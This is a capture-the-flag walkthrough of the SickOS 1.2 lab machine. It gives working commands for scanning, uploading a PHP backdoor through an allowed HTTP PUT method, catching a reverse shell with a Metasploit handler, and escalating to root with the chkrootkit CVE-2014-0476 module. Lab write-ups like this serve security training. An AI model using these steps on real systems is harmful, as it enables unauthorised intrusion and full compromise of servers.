Information Security

SickOS 1.2 Walkthrough

 

SickOS 1.2
This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Scan for local IP via netdiscover command:
Netdiscover 
IP: 192.168.236.136
It may different in your lab,
1.png
Scan the IP target with nmap as default:
nmap -A -vv -T4  192.168.236.136
2.png
We detect two ports are open 22/tcp and 80/tcp
Scan all TCP ports and for faster usage we can use zenmap:
  • Type zenmap to open zenmap tool
  • Type the IP in target: 192.168.236.136
  • Choose from profile: Intense scan, all TCP ports
As showing in screen shot:
nmap -p 1-65535 -T4 -A -v 192.168.236.136
3.png
Scan all UDP ports
  • Type the IP in target: 192.168.236.136
  • Choose from profile:Intense scan plus UDP
4
We didn’t find useful ports from UDP scan, So we go back to TCP scan.
After we determined the target has 80 port is open so we will browse it.
We run nikto -h to scan the web and detect directory in that host:
    nikto -h 192.168.236.136
5.png
After there is now useful result we run dirbuster with medium word-list
dirubuster to find directories in different tool,
  • Type http://192.168.236.136in the target textfiled.
  • Check Go Faster for speed process.
  • Choose the wordlist in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  • Click Start
6.png
Then we detect “test” directory let’s open it in browser
Let’s analyze the page and open view source,
nothing useful, So we can analyze the server side command either via burpsuite or via curl command and use OPTIONS to determine web functions are allowed
#curl -v -X OPTIONS http://192.168.236.136/test
7.png
After we detect that PUT command is allowed, we can put our shell either via burpsuite or via Nmap,
Let us generate shell first
I use ready shell in kali by default using:
    locate shell
8.png
Copy shell and rename it as shell.php
    cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit the shell.php via command:
    nano shell.php
9.png
$ip=’192.168.236.135′ 
    >> kali IP
$port 443 
    >> because 4444 isn’t working
nmap -p 80 192.168.236.136 –script http-put –script-args http-put.url=’/test/shell.php’,http-put.file=’shell.php’
10.png
Successfully created!
Now we have to make listener, in two different way nc -lvp 443 or  metasploit but i prefer metasploit for Privilege Escalation later,
We use payload php/reverse_php  because we generate shell no meterpreter and that works for me,
Set local host (kali IP) and port (443) as we did in shell previously.
Then we type exploit (-jz) to work session in background.
msfconsole
use exploit/multi/handler
set payload php/reverse_php
set LHOST192.168.236.136
set LPORT 442
exploit -jz
11.png
Final options:
12.png
Then we move to this shell via browser:
13.png
Finally we got a user shell!
But with normal user www-data
14.png
For Privilege Escalation first we check the current process running and has root privileges:
ls -la
15.png
We saw that linechkrootkit has root privileges,
drwxr-xr-x  2 john john  4096 Apr 12  2016 chkrootkit-0.49
After figure out for vulnerability in Google we discovered:
vulnerability of chkrootkit CVE-2014-0476 this could allow me to escalate my privilge.
with metasploit module.
  • use exploit/unix/local/chkrootkit
  • set session 1
After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1 and arbitrary lport such a 8080 and run the module.
for me i set session 3 because i already opened sessions 1 and 2.
16.png
Type
>Info
17.png
Make sure about lport with options command:
18.png
Then type run
19.png
session 4 opened ! in my case,
Type id 
To see the privilege account
20.png
Now we are root!
open the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt text for final flag:
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
21.png
I Hope you enjoy it!
contact me twitter:
Advertisements